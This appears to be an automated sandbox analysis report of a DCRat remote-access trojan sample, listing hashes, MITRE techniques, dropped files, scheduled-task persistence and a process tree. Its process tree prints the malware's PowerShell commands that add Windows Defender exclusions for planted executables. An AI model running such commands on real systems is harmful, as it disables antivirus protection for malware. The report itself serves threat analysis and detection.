dcrat | c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8

Analysis

max time kernel
150s
max time network
155s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
23/12/2024, 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe
Size

1.3MB
MD5

e250d59ce709beb07e27857ff3e53e39
SHA1

c4502182b1137497456e00d5ba9a9b2b26e49b73
SHA256

c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8
SHA512

ad549c145fd30181a19e029670e13b86647dbc935c4a03b6f28c1ce8fbfd0dc87af0c44bc6b8a289780785a4d21a7bbefd0a50b6cb93f5a4e66f39cc3a05cf7f
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2892	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2824	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2612	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2304	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1636	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2412	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2968	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	896	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	524	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1208	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1596	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1600	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	572	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2432	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2236	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1672	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1960	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1128	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2676	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1800	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	672	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2452	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2848	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1656	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2680	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2668	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2584	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2244	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	792	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	868	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	824	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2724	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2748	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1216	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1960	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	2164	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	2164	schtasks.exe	34

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0008000000016ce9-10.dat	dcrat
behavioral1/memory/3060-13-0x0000000000C30000-0x0000000000D40000-memory.dmp	dcrat
behavioral1/memory/2892-150-0x0000000000FE0000-0x00000000010F0000-memory.dmp	dcrat
behavioral1/memory/1104-197-0x0000000001210000-0x0000000001320000-memory.dmp	dcrat
behavioral1/memory/524-320-0x0000000001360000-0x0000000001470000-memory.dmp	dcrat
behavioral1/memory/2540-380-0x00000000002A0000-0x00000000003B0000-memory.dmp	dcrat
behavioral1/memory/1376-440-0x0000000001170000-0x0000000001280000-memory.dmp	dcrat
behavioral1/memory/920-619-0x0000000001390000-0x00000000014A0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 25 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1444	powershell.exe
1988	powershell.exe
2192	powershell.exe
2780	powershell.exe
2756	powershell.exe
1744	powershell.exe
2152	powershell.exe
2204	powershell.exe
624	powershell.exe
2976	powershell.exe
1044	powershell.exe
3064	powershell.exe
3052	powershell.exe
944	powershell.exe
2616	powershell.exe
2168	powershell.exe
2612	powershell.exe
2764	powershell.exe
736	powershell.exe
3056	powershell.exe
2812	powershell.exe
2948	powershell.exe
1436	powershell.exe
2172	powershell.exe
1232	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
3060	DllCommonsvc.exe
2892	DllCommonsvc.exe
1104	explorer.exe
2328	explorer.exe
524	explorer.exe
2540	explorer.exe
1376	explorer.exe
3000	explorer.exe
2880	explorer.exe
920	explorer.exe

Loads dropped DLL 2 IoCs

pid	Process
3016	cmd.exe
3016	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
13	raw.githubusercontent.com
16	raw.githubusercontent.com
19	raw.githubusercontent.com
23	raw.githubusercontent.com
26	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\DllCommonsvc.exe	DllCommonsvc.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\a76d7bf15d8370	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\dllhost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\5940a34987c991	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\fr-FR\27d1bcfc3c54e0	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\1610b97d3ab4a7	DllCommonsvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\smss.exe	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\csrss.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\fr-FR\System.exe	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OSPPSVC.exe	DllCommonsvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\69ddcba757bf72	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\886983d96e3d3e	DllCommonsvc.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\PLA\Reports\en-US\smss.exe	DllCommonsvc.exe
File created	C:\Windows\PLA\Reports\en-US\69ddcba757bf72	DllCommonsvc.exe
File created	C:\Windows\schemas\TSWorkSpace\wininit.exe	DllCommonsvc.exe
File created	C:\Windows\Boot\DVD\PCAT\fr-FR\dwm.exe	DllCommonsvc.exe
File created	C:\Windows\Setup\cmd.exe	DllCommonsvc.exe
File created	C:\Windows\Setup\ebf1f9fa8afd6d	DllCommonsvc.exe
File created	C:\Windows\Vss\Writers\System\dllhost.exe	DllCommonsvc.exe
File created	C:\Windows\Vss\Writers\System\5940a34987c991	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2612	schtasks.exe
2968	schtasks.exe
2668	schtasks.exe
2584	schtasks.exe
2244	schtasks.exe
3004	schtasks.exe
2632	schtasks.exe
672	schtasks.exe
2304	schtasks.exe
2412	schtasks.exe
896	schtasks.exe
624	schtasks.exe
2236	schtasks.exe
1672	schtasks.exe
1960	schtasks.exe
2712	schtasks.exe
1948	schtasks.exe
2052	schtasks.exe
2796	schtasks.exe
1208	schtasks.exe
1596	schtasks.exe
1644	schtasks.exe
1696	schtasks.exe
1612	schtasks.exe
1680	schtasks.exe
1748	schtasks.exe
2188	schtasks.exe
1812	schtasks.exe
1636	schtasks.exe
1408	schtasks.exe
824	schtasks.exe
2724	schtasks.exe
2576	schtasks.exe
2684	schtasks.exe
1960	schtasks.exe
2892	schtasks.exe
532	schtasks.exe
1656	schtasks.exe
3040	schtasks.exe
740	schtasks.exe
2692	schtasks.exe
2880	schtasks.exe
1560	schtasks.exe
2788	schtasks.exe
2824	schtasks.exe
572	schtasks.exe
2224	schtasks.exe
1128	schtasks.exe
1500	schtasks.exe
2296	schtasks.exe
2676	schtasks.exe
2680	schtasks.exe
2996	schtasks.exe
1892	schtasks.exe
2432	schtasks.exe
792	schtasks.exe
2748	schtasks.exe
524	schtasks.exe
2452	schtasks.exe
2628	schtasks.exe
868	schtasks.exe
2980	schtasks.exe
2628	schtasks.exe
2292	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3060	DllCommonsvc.exe
3060	DllCommonsvc.exe
3060	DllCommonsvc.exe
3064	powershell.exe
2812	powershell.exe
2756	powershell.exe
2764	powershell.exe
2204	powershell.exe
3052	powershell.exe
2172	powershell.exe
2616	powershell.exe
2612	powershell.exe
2780	powershell.exe
1988	powershell.exe
1232	powershell.exe
1444	powershell.exe
736	powershell.exe
1436	powershell.exe
1744	powershell.exe
2152	powershell.exe
2948	powershell.exe
2168	powershell.exe
2892	DllCommonsvc.exe
2892	DllCommonsvc.exe
2892	DllCommonsvc.exe
624	powershell.exe
2192	powershell.exe
944	powershell.exe
3056	powershell.exe
1044	powershell.exe
2976	powershell.exe
1104	explorer.exe
2328	explorer.exe
524	explorer.exe
2540	explorer.exe
1376	explorer.exe
3000	explorer.exe
2880	explorer.exe
920	explorer.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	3060	DllCommonsvc.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	2892	DllCommonsvc.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	1104	explorer.exe
Token: SeDebugPrivilege	2328	explorer.exe
Token: SeDebugPrivilege	524	explorer.exe
Token: SeDebugPrivilege	2540	explorer.exe
Token: SeDebugPrivilege	1376	explorer.exe
Token: SeDebugPrivilege	3000	explorer.exe
Token: SeDebugPrivilege	2880	explorer.exe
Token: SeDebugPrivilege	920	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2256 wrote to memory of 1628	2256	JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe	30
PID 2256 wrote to memory of 1628	2256	JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe	30
PID 2256 wrote to memory of 1628	2256	JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe	30
PID 2256 wrote to memory of 1628	2256	JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe	30
PID 1628 wrote to memory of 3016	1628	WScript.exe	31
PID 1628 wrote to memory of 3016	1628	WScript.exe	31
PID 1628 wrote to memory of 3016	1628	WScript.exe	31
PID 1628 wrote to memory of 3016	1628	WScript.exe	31
PID 3016 wrote to memory of 3060	3016	cmd.exe	33
PID 3016 wrote to memory of 3060	3016	cmd.exe	33
PID 3016 wrote to memory of 3060	3016	cmd.exe	33
PID 3016 wrote to memory of 3060	3016	cmd.exe	33
PID 3060 wrote to memory of 3064	3060	DllCommonsvc.exe	89
PID 3060 wrote to memory of 3064	3060	DllCommonsvc.exe	89
PID 3060 wrote to memory of 3064	3060	DllCommonsvc.exe	89
PID 3060 wrote to memory of 2812	3060	DllCommonsvc.exe	90
PID 3060 wrote to memory of 2812	3060	DllCommonsvc.exe	90
PID 3060 wrote to memory of 2812	3060	DllCommonsvc.exe	90
PID 3060 wrote to memory of 2948	3060	DllCommonsvc.exe	91
PID 3060 wrote to memory of 2948	3060	DllCommonsvc.exe	91
PID 3060 wrote to memory of 2948	3060	DllCommonsvc.exe	91
PID 3060 wrote to memory of 2172	3060	DllCommonsvc.exe	92
PID 3060 wrote to memory of 2172	3060	DllCommonsvc.exe	92
PID 3060 wrote to memory of 2172	3060	DllCommonsvc.exe	92
PID 3060 wrote to memory of 2780	3060	DllCommonsvc.exe	94
PID 3060 wrote to memory of 2780	3060	DllCommonsvc.exe	94
PID 3060 wrote to memory of 2780	3060	DllCommonsvc.exe	94
PID 3060 wrote to memory of 2616	3060	DllCommonsvc.exe	96
PID 3060 wrote to memory of 2616	3060	DllCommonsvc.exe	96
PID 3060 wrote to memory of 2616	3060	DllCommonsvc.exe	96
PID 3060 wrote to memory of 2168	3060	DllCommonsvc.exe	97
PID 3060 wrote to memory of 2168	3060	DllCommonsvc.exe	97
PID 3060 wrote to memory of 2168	3060	DllCommonsvc.exe	97
PID 3060 wrote to memory of 2756	3060	DllCommonsvc.exe	98
PID 3060 wrote to memory of 2756	3060	DllCommonsvc.exe	98
PID 3060 wrote to memory of 2756	3060	DllCommonsvc.exe	98
PID 3060 wrote to memory of 3052	3060	DllCommonsvc.exe	99
PID 3060 wrote to memory of 3052	3060	DllCommonsvc.exe	99
PID 3060 wrote to memory of 3052	3060	DllCommonsvc.exe	99
PID 3060 wrote to memory of 736	3060	DllCommonsvc.exe	101
PID 3060 wrote to memory of 736	3060	DllCommonsvc.exe	101
PID 3060 wrote to memory of 736	3060	DllCommonsvc.exe	101
PID 3060 wrote to memory of 1988	3060	DllCommonsvc.exe	103
PID 3060 wrote to memory of 1988	3060	DllCommonsvc.exe	103
PID 3060 wrote to memory of 1988	3060	DllCommonsvc.exe	103
PID 3060 wrote to memory of 2204	3060	DllCommonsvc.exe	104
PID 3060 wrote to memory of 2204	3060	DllCommonsvc.exe	104
PID 3060 wrote to memory of 2204	3060	DllCommonsvc.exe	104
PID 3060 wrote to memory of 2612	3060	DllCommonsvc.exe	105
PID 3060 wrote to memory of 2612	3060	DllCommonsvc.exe	105
PID 3060 wrote to memory of 2612	3060	DllCommonsvc.exe	105
PID 3060 wrote to memory of 2152	3060	DllCommonsvc.exe	106
PID 3060 wrote to memory of 2152	3060	DllCommonsvc.exe	106
PID 3060 wrote to memory of 2152	3060	DllCommonsvc.exe	106
PID 3060 wrote to memory of 1444	3060	DllCommonsvc.exe	107
PID 3060 wrote to memory of 1444	3060	DllCommonsvc.exe	107
PID 3060 wrote to memory of 1444	3060	DllCommonsvc.exe	107
PID 3060 wrote to memory of 1744	3060	DllCommonsvc.exe	108
PID 3060 wrote to memory of 1744	3060	DllCommonsvc.exe	108
PID 3060 wrote to memory of 1744	3060	DllCommonsvc.exe	108
PID 3060 wrote to memory of 1232	3060	DllCommonsvc.exe	109
PID 3060 wrote to memory of 1232	3060	DllCommonsvc.exe	109
PID 3060 wrote to memory of 1232	3060	DllCommonsvc.exe	109
PID 3060 wrote to memory of 2764	3060	DllCommonsvc.exe	110

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c892368adb994719e252cb4cf2749dcc966fd89cff67ceaa66d62e3f339b75b8.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\sppsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Local Settings\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\OSPPSVC.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\System\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Links\Idle.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Reports\en-US\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RBc6fQQaMD.bat"
        5⤵
        
        PID:1460
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:1064
      - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        6⤵
        Executes dropped EXE
